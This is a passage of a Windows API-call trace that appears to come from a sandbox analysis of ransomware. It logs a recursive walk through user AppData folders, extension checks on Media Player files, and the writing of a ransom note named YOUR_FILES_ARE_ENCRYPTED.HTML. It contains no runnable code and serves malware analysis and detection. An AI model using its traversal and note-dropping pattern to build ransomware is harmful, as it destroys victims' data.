(in: param_1=0x4ebd456, param_2="%02X" | out: param_1="55") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="2D") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="E0") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="09") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="84") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="D2") returned 2 [0170.341] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="75") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="64") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="57") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="79") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="CD") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="E8") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="22") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="67") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="59") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="91") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="49") returned 2 [0170.342] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="0B") returned 2 [0170.342] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" [0170.342] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.342] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0170.343] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad9e0a4, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x2f9d, dwReserved0=0x0, dwReserved1=0x60, cFileName="brndlog.txt", cAlternateFileName="")) returned 0 [0170.343] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.343] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0170.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.343] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.346] CloseHandle (hObject=0x5fc) returned 1 [0170.346] GetProcessHeap () returned 0x270000 [0170.347] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0170.348] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4a8be66, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0170.348] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player") returned 57 [0170.348] GetProcessHeap () returned 0x270000 [0170.348] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0170.348] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player" [0170.348] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\*" [0170.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4a8be66, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.360] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4a8be66, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.360] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4b96808, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x105000, dwReserved0=0x0, dwReserved1=0x60, cFileName="CurrentDatabase_372.wmdb", cAlternateFileName="CURREN~1.WMD")) returned 1 [0170.360] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb") returned 82 [0170.360] lstrcmpW (lpString1="CurrentDatabase_372.wmdb", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.360] PathFindExtensionW (pszPath="CurrentDatabase_372.wmdb") returned=".wmdb" [0170.360] lstrlenW (lpString=".wmdb") returned 5 [0170.360] PathFindExtensionW (pszPath="CurrentDatabase_372.wmdb") returned=".wmdb" [0170.360] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4a8be66, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x109a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="LocalMLS_3.wmdb", cAlternateFileName="LOCALM~1.WMD")) returned 1 [0170.360] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb") returned 73 [0170.360] lstrcmpW (lpString1="LocalMLS_3.wmdb", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.360] PathFindExtensionW (pszPath="LocalMLS_3.wmdb") returned=".wmdb" [0170.360] lstrlenW (lpString=".wmdb") returned 5 [0170.360] PathFindExtensionW (pszPath="LocalMLS_3.wmdb") returned=".wmdb" [0170.360] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 1 [0170.360] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned 72 [0170.360] GetProcessHeap () returned 0x270000 [0170.360] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0170.360] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" [0170.360] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*" [0170.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.361] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.361] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0170.361] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 78 [0170.361] GetProcessHeap () returned 0x270000 [0170.361] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.361] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0170.361] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*" [0170.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0170.361] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.361] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="0000FDBE", cAlternateFileName="")) returned 1 [0170.361] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE") returned 87 [0170.362] GetProcessHeap () returned 0x270000 [0170.362] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x78c1008 [0170.379] lstrcpyW (in: lpString1=0x78c1008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE" [0170.379] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\*" [0170.379] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0170.539] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.539] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x0, dwReserved1=0x60, cFileName="01_Music_auto_rated_at_5_stars.wpl", cAlternateFileName="01_MUS~1.WPL")) returned 1 [0170.539] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\01_Music_auto_rated_at_5_stars.wpl") returned 122 [0170.539] lstrcmpW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.540] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0170.540] lstrlenW (lpString=".wpl") returned 4 [0170.540] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0170.540] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8657653f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0x0, dwReserved1=0x60, cFileName="02_Music_added_in_the_last_month.wpl", cAlternateFileName="02_MUS~1.WPL")) returned 1 [0170.540] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\02_Music_added_in_the_last_month.wpl") returned 124 [0170.540] lstrcmpW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.540] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0170.540] lstrlenW (lpString=".wpl") returned 4 [0170.540] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0170.540] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4f3, dwReserved0=0x0, dwReserved1=0x60, cFileName="03_Music_rated_at_4_or_5_stars.wpl", cAlternateFileName="03_MUS~1.WPL")) returned 1 [0170.540] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\03_Music_rated_at_4_or_5_stars.wpl") returned 122 [0170.540] lstrcmpW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.540] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0170.540] lstrlenW (lpString=".wpl") returned 4 [0170.540] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0170.540] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0x0, dwReserved1=0x60, cFileName="04_Music_played_in_the_last_month.wpl", cAlternateFileName="04_MUS~1.WPL")) returned 1 [0170.540] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\04_Music_played_in_the_last_month.wpl") returned 125 [0170.540] lstrcmpW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.540] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0170.540] lstrlenW (lpString=".wpl") returned 4 [0170.540] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0170.540] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x31d, dwReserved0=0x0, dwReserved1=0x60, cFileName="05_Pictures_taken_in_the_last_month.wpl", cAlternateFileName="05_PIC~1.WPL")) returned 1 [0170.540] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\05_Pictures_taken_in_the_last_month.wpl") returned 127 [0170.540] lstrcmpW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.540] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0170.540] lstrlenW (lpString=".wpl") returned 4 [0170.540] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0170.541] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x311, dwReserved0=0x0, dwReserved1=0x60, cFileName="06_Pictures_rated_4_or_5_stars.wpl", cAlternateFileName="06_PIC~1.WPL")) returned 1 [0170.541] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\06_Pictures_rated_4_or_5_stars.wpl") returned 122 [0170.541] lstrcmpW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.541] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0170.541] lstrlenW (lpString=".wpl") returned 4 [0170.541] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0170.541] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0x0, dwReserved1=0x60, cFileName="07_TV_recorded_in_the_last_week.wpl", cAlternateFileName="07_TV_~1.WPL")) returned 1 [0170.541] wnsprintfW (in: pszDest=0x78c1008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\07_TV_recorded_in_the_last_week.wpl") returned 123 [0170.541] lstrcmpW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.541] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0170.541] lstrlenW (lpString=".wpl") returned 4 [0170.541] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0170.541] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbbd4e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbbd4e0, 